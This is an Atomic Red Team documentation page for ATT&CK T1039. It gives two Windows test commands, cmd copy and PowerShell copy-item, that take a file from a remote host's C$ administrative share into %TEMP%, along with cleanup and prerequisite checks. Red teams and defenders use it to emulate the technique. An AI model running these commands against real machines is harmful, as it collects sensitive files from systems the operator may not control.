Skip to content
Atomic Red Team
atomics
T1039

T1039 - Data from Network Shared Drive

Description from ATT&CK (opens in a new tab)

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd (opens in a new tab) may be used to gather information.

Atomic Tests


Atomic Test #1 - Copy a sensitive File over Administrative share with copy

Copy from sensitive File from the c$ of another LAN computer with copy cmd https://twitter.com/SBousseaden/status/1211636381086339073 (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660

Inputs:

NameDescriptionTypeDefault Value
remoteRemote server namestring127.0.0.1
share_fileRemote Path to the filepathWindows\temp\Easter_Bunny.password
local_fileLocal namestringEaster_egg.password

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}

Cleanup Commands:

del \\#{remote}\C$\#{share_file}
del %TEMP%\#{local_file}

Dependencies: Run with powershell!

Description: Administrative share must exist on #{remote}
Check Prereq Commands:
if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host 'Please Enable "C$" share on #{remote}'
Description: "\#{remote}\C$#{share_file}" must exist on #{remote}
Check Prereq Commands:
if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
Get Prereq Commands:
Out-File -FilePath "\\#{remote}\C$\#{share_file}"


Atomic Test #2 - Copy a sensitive File over Administrative share with Powershell

Copy from sensitive File from the c$ of another LAN computer with powershell https://twitter.com/SBousseaden/status/1211636381086339073 (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 7762e120-5879-44ff-97f8-008b401b9a98

Inputs:

NameDescriptionTypeDefault Value
remoteRemote server namestring127.0.0.1
share_fileRemote Path to the filepathWindows\temp\Easter_Bunny.password
local_fileLocal namestringEaster_egg.password

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"

Cleanup Commands:

Remove-Item -Path "\\#{remote}\C$\#{share_file}"
Remove-Item -Path "$Env:TEMP\#{local_file}"

Dependencies: Run with powershell!

Description: Administrative share must exist on #{remote}
Check Prereq Commands:
if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host 'Please Enable "C$" share on #{remote}'
Description: "\#{remote}\C$#{share_file}" must exist on #{remote}
Check Prereq Commands:
if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
Get Prereq Commands:
Out-File -FilePath "\\#{remote}\C$\#{share_file}"